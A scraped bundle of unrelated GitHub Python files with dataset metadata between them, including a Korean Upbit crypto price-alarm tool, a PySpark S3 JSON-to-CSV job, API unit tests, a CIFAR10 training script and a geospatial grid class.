self.container[idx].timestamp >= item.timestamp:
# print(f"<<comparing {self.container[idx].timestamp} and {item.timestamp}")
if self.container[idx].timestamp == item.timestamp:
return None
idx += 1
if idx == len(self.container):
self.container.append(item)
else:
self.container.insert(idx, item)
# determine the newest
first = self.container.popleft()
self.container.appendleft(first)
# determine the last
last = self.container.pop()
if last.timestamp + self.interval > first.timestamp:
self.container.append(last)
return None
# determine the last outranged
outranged = last
while last.timestamp + self.interval < item.timestamp and \
last != item:
outranged = last
last = self.container.pop()
self.container.append(last)
true_interval = item.timestamp - outranged.timestamp
true_change = (item.price - outranged.price) / item.price
# if satisfies condition, send off an alarm
if abs(true_change) > self.change and true_change * self.change > 0 and self.is_active:
self.time_disabled = datetime.datetime.now().timestamp()
self.is_active = False
return Alarm(first.timestamp, self.market_code, first.market_name, 0, true_change, true_interval)
class Alarm:
def __init__(self, time, market_code, market_name, market_cap, d_ratio, d_time):
# text = market_code_to_kor[self.market_code] + "(" + self.market + "): "
self.time = time
self.text = market_name + "(" + market_code + "): "
self.text += "지난 " + tdstr(datetime.timedelta(seconds=d_time)) + " 동안"
self.text += f"{d_ratio * 100:.3f}% 변화했습니다\n"
# self.text += f"현재 시세는 {cur_price:.2f}, 현재 시간은 {datetime.datetime.fromtimestamp(time)} 입니다"
self.text += f"현재 시간은 {datetime.datetime.fromtimestamp(time)} 입니다"
def __str__(self):
return self.text
class Criteria:
def __init__(self, cid, d_ratio, d_time, cooldown):
self.cid = cid
self.d_ratio = d_ratio
self.d_time = d_time
self.cooldown = cooldown
self.monitor_dict = {}
def add_monitor(self, new_market):
new_monitor = MarketMonitor(self.d_ratio, new_market, self.d_time, self.cooldown)
self.monitor_dict[new_market] = new_monitor
def update_monitors(self, new_items):
alarms = []
for market, item in new_items.items():
if market not in self.monitor_dict.keys():
self.add_monitor(market)
ret = self.monitor_dict[market].update_ticker(item)
if ret != None:
alarms.append(ret)
return alarms
class Monitor:
def __init__(self):
self.criteria_id = 1
self.criteria = []
self.criteria_lock = threading.Lock()
self.message = deque()
self.message_lock = threading.Lock()
self.alarm_window_num = 0
self.alarm_window_lock = threading.Lock()
def update_messages(self, new_messages):
self.message_lock.acquire(blocking=True)
for msg in new_messages:
idx = 0
while idx < len(self.message) and msg.time >= self.message[idx].time:
idx += 1
if idx == len(self.message):
self.message.append(msg)
else:
self.message.insert(idx, msg)
if len(self.message) < 1:
self.message_lock.release()
return
first = self.message.popleft()
self.message.appendleft(first)
while len(self.message) > 0:
last = self.message.pop()
if last.time + 86400 > first.time:
self.message.append(last)
break
self.message_lock.release()
def alarm_thread_func(self, alarm):
if SOUND_SWITCH:
playsound('./alarm.wav')
if not ALARM_SWITCH or self.alarm_window_num > 10:
return
self.alarm_window_lock.acquire(blocking=True)
self.alarm_window_num += 1
self.alarm_window_lock.release()
ctypes.windll.user32.MessageBoxW(0, alarm.text, "알림", 0)
self.alarm_window_lock.acquire(blocking=True)
self.alarm_window_num -= 1
self.alarm_window_lock.release()
def send_alarm(self, alarm):
threading.Thread(target=Monitor.alarm_thread_func, args=(self, alarm)).start()
def _monitor(self):
new_messages = []
markets = UpbitWrapper.get_all_markets()
if markets == None:
return
r_dict = UpbitWrapper.get_tickers(markets)
if r_dict == None:
return
market_tickers = {} # dict, key: market code
for market in r_dict:
if "KRW" not in market['market']:
continue
cur_price = market['trade_price']
timestamp = market['timestamp'] / 1e3
item = Ticker(markets[market['market']], 0, cur_price, timestamp)
market_tickers[market['market']] = item
self.criteria_lock.acquire(blocking=True)
for criterion in self.criteria:
new_messages.extend(criterion.update_monitors(market_tickers))
self.criteria_lock.release()
self.update_messages(new_messages)
for msg in new_messages:
self.send_alarm(msg)
return
def _monitor_wrapper(self):
self._monitor()
threading.Timer(0.05, Monitor._monitor_wrapper, args=(self,)).start()
def start(self):
threading.Thread(target=Monitor._monitor_wrapper, args=(self,)).start()
def add_criteria(self, d_ratio, d_time, cooldown):
new_criteria = Criteria(self.criteria_id, d_ratio, d_time, cooldown)
self.criteria_id += 1
self.criteria_lock.acquire(blocking=True)
self.criteria.append(new_criteria)
self.criteria_lock.release()
return self.criteria_id - 1
def list_criteria(self):
text = ""
self.criteria_lock.acquire(blocking=True)
for c in self.criteria:
text += f"알람 ID: {c.cid} 변화율: {c.d_ratio * 100}% 시간 간격: {datetime.timedelta(seconds=c.d_time)} 알람 주기: {datetime.timedelta(seconds=c.cooldown)}"
self.criteria_lock.release()
return text
def remove_criteria(self, cid):
i = 0
self.criteria_lock.acquire(blocking=True)
for i in range(len(self.criteria)):
if self.criteria[i].cid == cid:
self.criteria.pop(i)
self.criteria_lock.release()
return True
self.criteria_lock.release()
return False
def list_messages(self):
text = ""
self.message_lock.acquire(blocking=True)
for item in self.message:
text += "-----------------------------------------------\n"
text += str(datetime.datetime.fromtimestamp(item.time)) + "\n"
text += item.text + "\n"
self.message_lock.release()
return text
monitor = Monitor()
monitor.start()
print("===============================")
print("환영합니다! 도움말은 h를 입력하세요")
print("주의: 알람 메세지 박스는 최신이 아닐 수 있습니다")
print("주의: m을 입력해 메세지함을 사용하세요")
print("===============================")
while True:
print(">> ", end=' ')
user_input = input().lower()
if user_input == 'h':
help_text = "도움말은 h를 입력하세요\n \
알람 추가는 a를 입력하세요\n \
알람 목록 보기는 l을 입력하세요\n \
알람 삭제를 위해선 r <알람 ID>를 입력하세요 (예시: r 3)\n \
전체 알람 끄기/켜기는 d을 입력하세요\n \
알람 소리 끄기/켜기는 s을 입력하세요\n \
메세지함은 m을 입력하세요"
print(help_text)
if user_input == 'q':
os._exit(0)
if user_input[:1] == 'r':
cid = 0
while True:
try:
cid = int(user_input[1:])
except:
print("잘못 입력하셨습니다. 처음으로 돌아갑니다.")
continue
break
if monitor.remove_criteria(cid) == False:
print("알람을 성공적으로 삭제했습니다")
else:
print("대상 알람 ID를 찾을 수 없습니다")
if user_input == 'l':
text = monitor.list_criteria()
print(text)
if user_input == 'm':
print(monitor.list_messages())
if user_input == 'd':
if ALARM_SWITCH:
ALARM_SWITCH = False
print("모든 알람이 꺼졌습니다")
else:
ALARM_SWITCH = True
print("알람이 다시 작동합니다")
if user_input == 's':
if SOUND_SWITCH:
SOUND_SWITCH = False
print("곧 모든 소리가 꺼집니다")
else:
SOUND_SWITCH = True
print("소리가 켜졌습니다")
if user_input == 'a':
print("알람을 추가합니다")
while True:
try:
print("변화율을 입력하세요 (% 단위): ")
change = float(input()) / 100
except:
continue
break
if change == 0:
print("변화율은 0%가 될 수 없습니다. 처음으로 돌아갑니다")
continue
print("시간 간격을 입력하세요: 입력하신 시간 간격 동안 변화율 이상의 변화가 감지되면 알림을 내보냅니다")
print("------------")
min = sec = 0
while True:
try:
print("분을 입력하세요 (알림의 간격이 3일 1시간 30분 12.52초라면 30을 입력): ", end='')
min = int(input())
except:
continue
break
while True:
try:
print("초를 입력하세요 (알림의 간격이 3일 1시간 30분 12.52초라면 12.52를 입력): ", end='')
sec = float(input())
except:
continue
break
interval = datetime.timedelta(minutes=min, seconds=sec).total_seconds()
if interval == 0:
print("시간 간격은 0이 될 수 없습니다. 처음으로 돌아갑니다")
continue
print("알람 주기를 입력하세요: 알람이 울린 후 다시 울리기까지 걸리는 시간입니다")
print("------------")
min = 0
while True:
try:
print("분을 입력하세요 (알림의 간격이 3일 1시간 30분 12.52초라면 30을 입력): ", end='')
min = int(input())
except:
continue
break
cooldown = datetime.timedelta(minutes=min).total_seconds()
if cooldown == 0:
print("알람 주기는 0이 될 수 없습니다. 처음으로 돌아갑니다")
continue
cid = monitor.add_criteria(change, interval, cooldown)
if cid > 0:
print(f"알람이 성공적으로 추가됐습니다. 알람 ID: <{cid}>")
| livelykitten/Coinwork | Document1.py | Document1.py | py | 11,579 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 68,
"usage_type": "attribute"
},
{
"api_name": "dateti... |
24684070432 | # -*- coding: utf-8 -*-
"""
Created on Sat Aug 3 12:48:55 2019
@author: sudesh.amarnath
"""
import boto3
import os
import glob
import findspark
findspark.init('/home/ubuntu/spark-2.1.1-bin-hadoop2.7')
import pyspark
from pyspark.sql import SparkSession
spark = SparkSession.builder.appName('test').getOrCreate()
from pyspark.sql.functions import concat_ws,concat,lit,Column,regexp_replace
def upload_file(file_name, bucket, object_name=None):
if object_name is None:
object_name = file_name
s3_client = boto3.client('s3')
response = s3_client.upload_file(file_name, bucket, object_name)
s3 = boto3.resource('s3')
my_bucket = s3.Bucket('sudeshrandom')
for file in my_bucket.objects.all():
if ".json" in file.key:
file_name=file.key
fname=file_name.replace('new/','')
with open(fname,'w') as f:
wfile_path='/home/ubuntu/processed/'+fname.replace('.json','')
obj = my_bucket.Object(file.key)
f.write(obj.get()['Body'].read().decode('utf-8'))
df= spark.read.option("multiLine", "true").json(fname)
df.select(concat_ws("",df['info.seed']).alias("id"),\
concat(concat_ws("",df['results.name.first']),lit(' '),concat_ws("",df['results.name.last'])).alias('Full_Name'),\
concat_ws("",df['results.gender']).alias("Gender"),\
concat_ws("",df['results.dob.date']).astype('date').alias("DoB"),\
concat_ws("",df['results.email']).alias("Email"),\
concat_ws("",df['results.phone']).alias("home_phone"),\
concat_ws("",df['results.cell']).alias("cell_phone"),\
concat_ws("",df['results.location.street']).alias("Street"),\
concat_ws("",df['results.location.city']).alias("City"),\
concat_ws("",df['results.location.state']).alias("State"),\
concat_ws("",df['results.nat']).alias("Country"),\
concat_ws("",df['results.location.postcode']).astype('int').alias("Postcode"),\
concat_ws("",df['results.location.coordinates.latitude']).alias("Latitude"),\
concat_ws("",df['results.location.coordinates.longitude']).alias("Longitude")
).coalesce(1).write.option("mapreduce.fileoutputcommitter.marksuccessfuljobs","false").option("header","true").csv(wfile_path)
os.remove(fname)
for s3_file in glob.glob(wfile_path+'/*.csv'):
cname='processed/'+fname.replace('.json','.csv')
upload_file(s3_file,'sudeshrandom',cname)
| sudeshg46/Phoenix | json_csv_extractor.py | json_csv_extractor.py | py | 2,733 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "findspark.init",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder.appName",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder",
"line_number": 15,
"usage_type": "attribute"
... |
31414321307 | import datetime
import json
from .base_test import BaseTestCase, LoggedActivity
class EditLoggedActivityTestCase(BaseTestCase):
"""Edit activity test cases."""
def setUp(self):
"""Inherit parent tests setUp."""
super().setUp()
# add tests logged activity and corresponding activity
self.alibaba_ai_challenge.save()
self.log_alibaba_challenge.save()
self.js_meet_up.save()
self.payload = dict(
description="Participated in that event",
activityId=self.js_meet_up.uuid
)
def test_edit_logged_activity_is_successful(self):
"""Test that editing a logged activity does not fail."""
response = self.client.put(
f'/api/v1/logged-activities/{self.log_alibaba_challenge.uuid}',
data=json.dumps(self.payload), headers=self.header
)
self.assertEqual(response.status_code, 200)
message = 'Activity edited successfully'
self.assertEqual(
json.loads(response.get_data(as_text=True))['message'], message
)
edited_activity = LoggedActivity.query.get(
self.log_alibaba_challenge.uuid
)
self.assertEqual(edited_activity.activity_id, self.js_meet_up.uuid)
def test_edit_logged_activity_by_non_owner_is_unsuccessful(self):
"""
Test that editing a logged activity that
doesn't belong to you fails.
"""
self.header["Authorization"] = self.generate_token(
self.test_user2_payload
)
response = self.client.put(
f'/api/v1/logged-activities/{self.log_alibaba_challenge.uuid}',
data=json.dumps(self.payload), headers=self.header
)
self.assertEqual(response.status_code, 404)
def test_edit_logged_activity_that_is_no_longer_pending(self):
"""
Test that editing a logged activity that has been approved or rejected
fails.
"""
self.log_alibaba_challenge.status = 'approved'
self.alibaba_ai_challenge.save()
response = self.client.put(
f'/api/v1/logged-activities/{self.log_alibaba_challenge.uuid}',
data=json.dumps(self.payload), headers=self.header
)
self.assertEqual(response.status_code, 401)
def test_edit_logged_activity_parser_works(self):
"""
Test that during editing a logged activity, the marshamallow result
parser works the same way it does while logging an activity.
"""
self.js_meet_up.activity_date = datetime.date.today() - \
datetime.timedelta(days=31)
self.js_meet_up.save()
response = self.client.put(
f'/api/v1/logged-activities/{self.log_alibaba_challenge.uuid}',
data=json.dumps(self.payload), headers=self.header
)
self.assertEqual(response.status_code, 422)
message = 'You\'re late. That activity happened more than 30 days ago'
self.assertEqual(
json.loads(response.get_data(as_text=True))['message'], message
)
self.payload['activityId'] = 'invalid_activity_id'
response = self.client.put(
f'/api/v1/logged-activities/{self.log_alibaba_challenge.uuid}',
data=json.dumps(self.payload), headers=self.header
)
self.assertEqual(response.status_code, 422)
message = 'Invalid activity id'
self.assertEqual(
json.loads(response.get_data(as_text=True))['message'], message
)
def test_edit_logged_activity_validation_works(self):
"""
Test that during editing a logged activity, validation via marshmallow
works the same way it does while logging an activity.
"""
self.payload['activityTypeId'] = 'blah blah'
response = self.client.put(
f'/api/v1/logged-activities/{self.log_alibaba_challenge.uuid}',
data=json.dumps(self.payload), headers=self.header
)
self.assertEqual(response.status_code, 400)
def test_secretary_edit_logged_activity_works(self):
"""Test secretaty can change status to pending."""
payload = {'status': 'pending'}
uuid = self.log_alibaba_challenge.uuid
response = self.client.put(
f'/api/v1/logged-activities/review/{uuid}',
data=json.dumps(payload),
headers=self.society_secretary
)
response_payload = json.loads(response.data)
self.assertEqual(response_payload.get('data').get('status'),
payload.get('status'))
self.assertEqual(response.status_code, 200)
def test_secretary_edit_reject_activity_works(self):
"""Test secretary can change status to rejected."""
payload = {'status': 'rejected'}
uuid = self.log_alibaba_challenge.uuid
response = self.client.put(
f'/api/v1/logged-activities/review/{uuid}',
data=json.dumps(payload),
headers=self.society_secretary
)
response_payload = json.loads(response.data)
self.assertEqual(response_payload.get('data').get('status'),
payload.get('status'))
self.assertEqual(response.status_code, 200)
def test_secretary_edit_invalid_input(self):
"""Test invalid input is rejected."""
payload = {'status': 'invalid'}
uuid = self.log_alibaba_challenge.uuid
response = self.client.put(
f'/api/v1/logged-activities/review/{uuid}',
data=json.dumps(payload),
headers=self.society_secretary
)
self.assertEqual(response.status_code, 400)
def test_secretary_edit_non_existent_logged_activity(self):
"""Test edit non-existent activity returns 404"""
payload = {'status': 'invalid'}
response = self.client.put(
'/api/v1/logged-activities/review/-KlHerwfafcvavefa',
data=json.dumps(payload),
headers=self.society_secretary
)
response_payload = json.loads(response.data)
self.assertEqual(response_payload.get('message'),
'Logged activity not found')
self.assertEqual(response.status_code, 404)
def test_secretary_edit_logged_activity_empty_payload(self):
"""Test edit activity with empty payload returns 400"""
payload = {}
response = self.client.put(
'/api/v1/logged-activities/review/-KlHerwfafcvavefa',
data=json.dumps(payload),
headers=self.society_secretary
)
response_payload = json.loads(response.data)
self.assertEqual(response_payload.get('message'),
'status is required.')
self.assertEqual(response.status_code, 400)
| andela/andela-societies-backend | src/tests/test_edit_logged_activity.py | test_edit_logged_activity.py | py | 6,852 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "base_test.BaseTestCase",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "json.dumps",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "base_test.LoggedActivity.... |
40393533142 | #!/usr/bin/env python
import argparse
import random
import numpy as np
import pandas as pd
from pathlib import Path
import torch
from torch import optim
from torch import nn
from torch import cuda
import torchvision
from uniform_augment import ImageTransform
from model import load_model
from train import train_model
from utils import visualize_logs
random.seed(123)
np.random.seed(123)
torch.manual_seed(123)
parser = argparse.ArgumentParser()
parser.add_argument('base_dir', type=str)
parser.add_argument('model', type=str)
parser.add_argument('--num_epochs', default=100, type=int)
parser.add_argument('--early_stopping', action='store_true')
args = parser.parse_args()
# Loading and normalizing CIFAR10
size = 224
mean = (0.485, 0.456, 0.406)
std = (0.229, 0.224, 0.225)
transform_train = ImageTransform(size, mean, std, train=True)
transform_test = ImageTransform(size, mean, std, train=False)
dataset_train = torchvision.datasets.CIFAR10(root=args.base_dir, train=True, download=True, transform=transform_train)
dataset_test = torchvision.datasets.CIFAR10(root=args.base_dir, train=False, download=True, transform=transform_test)
# Setting parameters
LEARNING_RATE = 1e-3
BATCH_SIZE = 32
device = 'cuda' if cuda.is_available() else 'cpu'
print(f'device: {device}')
# Loading a pretrained model
net = load_model(args.model, 10)
# Defining a loss function
criterion = nn.CrossEntropyLoss()
# Defining an optimizer
optimizer = optim.SGD(net.parameters(), lr=LEARNING_RATE, momentum=0.9)
# Training the network
torch.backends.cudnn.benchmark = True
print(f'model: {args.model}')
log = train_model(args.model,
dataset_train,
dataset_test,
BATCH_SIZE,
net,
criterion,
optimizer,
args.num_epochs,
args.base_dir,
device=device,
early_stopping=args.early_stopping)
# Visualizing logs
visualize_logs(log, Path(args.base_dir, f'train_log_{args.model}.png'))
| yamaru12345/UniformAugment | main.py | main.py | py | 2,045 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "random.seed",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "torch.manual_seed",
... |
70955306664 | """ Tests for scramble generation background tasks. """
from unittest.mock import Mock, patch, call
import pytest
from huey.exceptions import TaskException
from cubersio.tasks import huey
from cubersio.tasks.scramble_generation import check_scramble_pool, ScramblePoolTopOffInfo, top_off_scramble_pool
from cubersio.util.events.resources import EVENT_3x3, EVENT_10x10, EVENT_COLL, EVENT_FTO, EVENT_REX
# Put Huey in immediate mode so the tasks execute synchronously
huey.immediate = True
def _setup_mock(**kwargs):
""" Utility function for setting up a mocked Event or EventDefinition. Need to use Mock::configure because Events
and EventDefinitions have a `name` attribute which we need to override, and `name` is usually a special reserved
attribute for Mock. """
mock_event = Mock()
mock_event.configure_mock(**kwargs)
return mock_event
@patch('cubersio.tasks.scramble_generation.get_all_events')
@patch('cubersio.tasks.scramble_generation.top_off_scramble_pool')
def test_check_scramble_pool(mock_top_off_scramble_pool, mock_get_all_events):
""" Test that the scrambler pool checker task makes the appropriate calls to top_off_scramble_pool based on the
number of remaining scrambles for each event. """
# 3x3 and FTO need scrambles, they are below the 2x weekly scrambles threshold.
# 10x10 has enough scrambles, and COLL doesn't have its scrambles pre-generated.
mock_get_all_events.return_value = [
_setup_mock(name=EVENT_3x3.name, id=1, scramble_pool=list(range(5)), totalSolves=5),
_setup_mock(name=EVENT_10x10.name, id=2, scramble_pool=list(range(5)), totalSolves=1),
_setup_mock(name=EVENT_COLL.name, id=3, scramble_pool=list(range(5)), totalSolves=5),
_setup_mock(name=EVENT_FTO.name, id=4, scramble_pool=list(), totalSolves=5),
]
check_scramble_pool()
mock_get_all_events.assert_called_once()
assert mock_top_off_scramble_pool.call_count == 2
mock_top_off_scramble_pool.assert_has_calls([
call(ScramblePoolTopOffInfo(1, EVENT_3x3.name, 5)),
call(ScramblePoolTopOffInfo(4, EVENT_FTO.name, 10))
])
@pytest.mark.parametrize('top_off_info', [
ScramblePoolTopOffInfo(event_id=10, event_name=EVENT_REX.name, num_scrambles=5),
ScramblePoolTopOffInfo(event_id=42, event_name=EVENT_FTO.name, num_scrambles=15),
])
@patch('cubersio.tasks.scramble_generation.add_scramble_to_scramble_pool')
@patch('cubersio.tasks.scramble_generation.get_event_definition_for_name')
def test_top_off_scramble_pool_multi_scramble_puzzles(mock_get_event_definition_for_name,
mock_add_scramble_to_scramble_pool,
top_off_info: ScramblePoolTopOffInfo):
""" Test that top_off_scramble_pool calls the event resource scrambler correctly for those events where scrambles
are generated in bulk because it's faster. """
scrambles = list(range(top_off_info.num_scrambles))
mock_event_def = _setup_mock(name=top_off_info.event_name)
mock_event_def.get_multiple_scrambles.return_value = scrambles
mock_get_event_definition_for_name.return_value = mock_event_def
top_off_scramble_pool(top_off_info)
mock_get_event_definition_for_name.assert_called_once_with(top_off_info.event_name)
mock_event_def.get_multiple_scrambles.assert_called_once_with(top_off_info.num_scrambles)
assert mock_add_scramble_to_scramble_pool.call_count == top_off_info.num_scrambles
expected_calls = [call(scramble, top_off_info.event_id) for scramble in scrambles]
mock_add_scramble_to_scramble_pool.assert_has_calls(expected_calls)
@patch('cubersio.tasks.scramble_generation.add_scramble_to_scramble_pool')
@patch('cubersio.tasks.scramble_generation.get_event_definition_for_name')
def test_top_off_scramble_pool_single_scramble_puzzles(mock_get_event_definition_for_name,
mock_add_scramble_to_scramble_pool):
""" Test that top_off_scramble_pool calls the event resource scrambler correctly for those events where scrambles
are generated one at a time. """
top_off_info = ScramblePoolTopOffInfo(event_id=11, event_name=EVENT_3x3.name, num_scrambles=5)
scrambles = list(range(top_off_info.num_scrambles))
mock_event_def = _setup_mock(name=top_off_info.event_name)
mock_event_def.get_scramble.side_effect = scrambles
mock_get_event_definition_for_name.return_value = mock_event_def
top_off_scramble_pool(top_off_info)
mock_get_event_definition_for_name.assert_called_once_with(top_off_info.event_name)
assert mock_event_def.get_scramble.call_count == top_off_info.num_scrambles
assert mock_add_scramble_to_scramble_pool.call_count == top_off_info.num_scrambles
expected_calls = [call(scramble, top_off_info.event_id) for scramble in scrambles]
mock_add_scramble_to_scramble_pool.assert_has_calls(expected_calls)
@patch('cubersio.tasks.scramble_generation.get_event_definition_for_name')
def test_top_off_scramble_pool_raises_for_nonexistent_event(mock_get_event_definition_for_name):
""" Test that top_off_scramble_pool raises RuntimeError for a bogus event. """
mock_get_event_definition_for_name.return_value = None
with pytest.raises(TaskException) as te:
top_off_scramble_pool(ScramblePoolTopOffInfo(event_id=1, event_name="blah", num_scrambles=5)).get()
assert f"Can't find an EventResource for event blah" in te.value.metadata['error']
| euphwes/cubers.io | tst/tasks/test_scramble_generation.py | test_scramble_generation.py | py | 5,529 | python | en | code | 27 | github-code | 36 | [
{
"api_name": "cubersio.tasks.huey.immediate",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "cubersio.tasks.huey",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "unittest.mock.Mock",
"line_number": 21,
"usage_type": "call"
},
{
"api_nam... |
23988137844 | from fastapi import APIRouter
import traceback
from .nl_to_sql_utils import get_similar_severities, get_most_relevant_severity, get_sql_query
from .nl_to_sql_prompts import tables_info
from pydantic import BaseModel
router = APIRouter()
class NLtoSQL(BaseModel):
"""Request body for streaming."""
query: str
@router.post("/nl_to_sql")
async def nl_to_sql(body: NLtoSQL):
"""
Args:
query (str): user query for which we want to find attack techniques
Returns:
json object with following fields
query(str),
most_relevant_severity(str),
sql_query(str)
"""
try:
query = body.query
similar_severities = get_similar_severities(query)
inputs = {
"user_query":query,
"severities":similar_severities
}
most_relevant_severity = await get_most_relevant_severity(inputs)
inputs = {
"tables_info":tables_info,
"severity_value":most_relevant_severity
}
sql_query = await get_sql_query(inputs)
return {
"query": query,
"most_relevant_severity": most_relevant_severity,
"sql_query": sql_query
}
except Exception as e:
traceback.print_exc() | yadneshSalvi/cybersec_genai | src/nl_to_sql/nl_to_sql_routes.py | nl_to_sql_routes.py | py | 1,288 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.APIRouter",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pydantic.BaseModel",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "nl_to_sql_utils.get_similar_severities",
"line_number": 27,
"usage_type": "call"
},
{
"api_nam... |
14566383158 | from django.core.management.base import BaseCommand
from depot.models import SiteBookPublish
class Command(BaseCommand):
def handle(self, **options):
for p in SiteBookPublish.objects.filter(status=0).order_by('created_at'):
print(p.id, p.site_book, p.created_at)
p.publish()
| fnp/redakcja | src/depot/management/commands/depot.py | depot.py | py | 314 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "depot.models.SiteBookPublish.objects.filter",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "depot.models.SiteBookPublish.objects",
"line_number": 7,
... |
71521743464 | from konlpy.tag import Okt
# 오픈 소스 한국어 분석기
# 속도는 느리지만, 정규화에 매우 좋음
from collections import Counter
def NLP(text) :
# Okt 형태소 분석기 객체 생성
okt = Okt()
#text = "냉장고 앞에서 최면!"
'''
# 형태소 추출
morphs = okt.morphs(text)
print(morphs)
# 형태소와 품사 태그 추출
pos = okt.pos(text)
print(pos)
'''
# 명사만 추출
nouns = okt.nouns(text)
for i,v in enumerate(nouns):
if len(v)<2:
nouns.pop(i)
count = Counter(nouns)
print(nouns)
# 명사 빈도 카운트
noun_list = count.most_common(100)
for v in noun_list :
print(v)
print("가장 높은 빈도 수의 단어 : ")
print(noun_list[0])
print("두 번째로 높은 빈도 수의 단어 : ")
print(noun_list[1])
print("두 단어를 합치기 : ")
nouns_list= noun_list[0][0]+' '+noun_list[1][0]
print(nouns_list)
'''
# 정규화, 어구 추출
text = "하나 둘 셋 장고!"
print(okt.normalize(text))
print(okt.phrases(text))
'''
return nouns_list #, noun_list[0], noun_list[1]
#text=input()
#NLP(text)
| Junst/KoNLPy-tTV | KoNLPy/KoNLPy_Okt.py | KoNLPy_Okt.py | py | 1,218 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "konlpy.tag.Okt",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "collections.Counter",
"line_number": 25,
"usage_type": "call"
}
] |
70955299304 | """add unique constraint to solve for scramble and event results
Revision ID: 5de7c9b4e68c
Revises: 66f166a908a4
Create Date: 2019-10-13 13:11:53.915868
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '5de7c9b4e68c'
down_revision = '66f166a908a4'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('user_solves', schema=None) as batch_op:
batch_op.create_unique_constraint('unique_scramble_user_results', ['scramble_id', 'user_event_results_id'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('user_solves', schema=None) as batch_op:
batch_op.drop_constraint('unique_scramble_user_results', type_='unique')
# ### end Alembic commands ###
| euphwes/cubers.io | migrations/versions/039_5de7c9b4e68c_add_unique_constraint_to_solve_for_.py | 039_5de7c9b4e68c_add_unique_constraint_to_solve_for_.py | py | 924 | python | en | code | 27 | github-code | 36 | [
{
"api_name": "alembic.op.batch_alter_table",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "alembic.op.batch_alter_table",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "... |
74267279783 | import requests
import time
TIMEOUT: int = 1
ATTEMPTS: int = 3
def _get_base_headers() -> dict:
"""Get base header for request."""
return {"Content-Type": "application/json"}
def _get(url: str, headers: dict, params: dict) -> requests.Response:
"""Send GET request to server."""
for _ in range(ATTEMPTS):
try:
response: requests.Response = requests.get(url, headers=headers, params=params, timeout=TIMEOUT)
return response
except requests.exceptions.Timeout:
time.sleep(0.5)
raise requests.exceptions.Timeout
def get(url: str, **kwargs) -> dict:
"""Sending package to server and return json response."""
headers: dict = _get_base_headers()
headers.update(kwargs.get("headers", {}))
params: dict = kwargs.get("params", {})
response = requests.get(url, headers=headers, params=params, timeout=TIMEOUT)
response.raise_for_status()
return response.json()
| gordienko-dmitry/job_analyzer | api/server.py | server.py | py | 961 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "requests.Response",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "requests.get",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "requests.exceptions",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "time.sle... |
15509801064 | import numpy as np
import geopandas
import shapely
class SparseGrid:
def __init__(self, x_lim, y_lim, n_cols=10, n_rows=10, tag_prefix = ''):
'''
General class to define a spatial frame composed of regular polygons,
based on a grid of size n_cols x n_rows
:param x_lim: Minimum and Maximum values in the horizontal axis.
Tupple of floats.
:param y_lim: Minimum and Maximum values in the vertical axis.
Tupple of floats.
:param n_cols: Number of columns in which the horizontal axis is divided.
Integer.
:param n_rows: Number of columns in which the vertical axis is divided.
Integer
:param tag_prefix: Prefix to use as id of the polygons in the grid.
String.
'''
assert len(x_lim) == 2 and np.diff(x_lim) > 0
assert len(y_lim) == 2 and np.diff(y_lim) > 0
assert isinstance(n_cols, int) and n_cols > 0
assert isinstance(n_rows, int) and n_cols > 0
assert isinstance(tag_prefix, str)
self.x_lim = x_lim
self.y_lim = y_lim
self.dx = (x_lim[1] - x_lim[0]) / n_cols
self.dy = (y_lim[1] - y_lim[0]) / n_rows
self.x_grid = np.linspace(x_lim[0], x_lim[1] - self.dx, n_cols)
self.y_grid = np.linspace(y_lim[0], y_lim[1] - self.dy, n_rows)
self.n_cols = n_cols
self.n_rows = n_rows
n_cells = self.n_cols * self.n_rows
id_size = len(str(n_cells - 1))
self.tag_prefix = tag_prefix
self.tags = [self.tag_prefix + '0' * (id_size - len(str(f'{i}'))) + f'{i}' for i in range(n_cols * n_rows) ]
self.sparse_frame = geopandas.GeoDataFrame({'id' :[], 'geometry' :None})
def get_row(self, y):
'''
Get the row in the grid to which a value y corresponds
:param y: Coordinate in the vertical axis
Float
:return: Row number
Integer
'''
if y >= self.y_lim[0] or y <= self.y_lim[1]:
return sum(self.y_grid <= y) - 1
def get_col(self, x):
'''
Get the column in the grid to which a value x corresponds
:param x: Coordinate in the horizontal axis
Float
:return: Column number
Integer
'''
if x >= self.x_lim[0] or x <= self.x_lim[1]:
return sum(self.x_grid <= x) - 1
def tag_from_ij(self, i, j):
'''
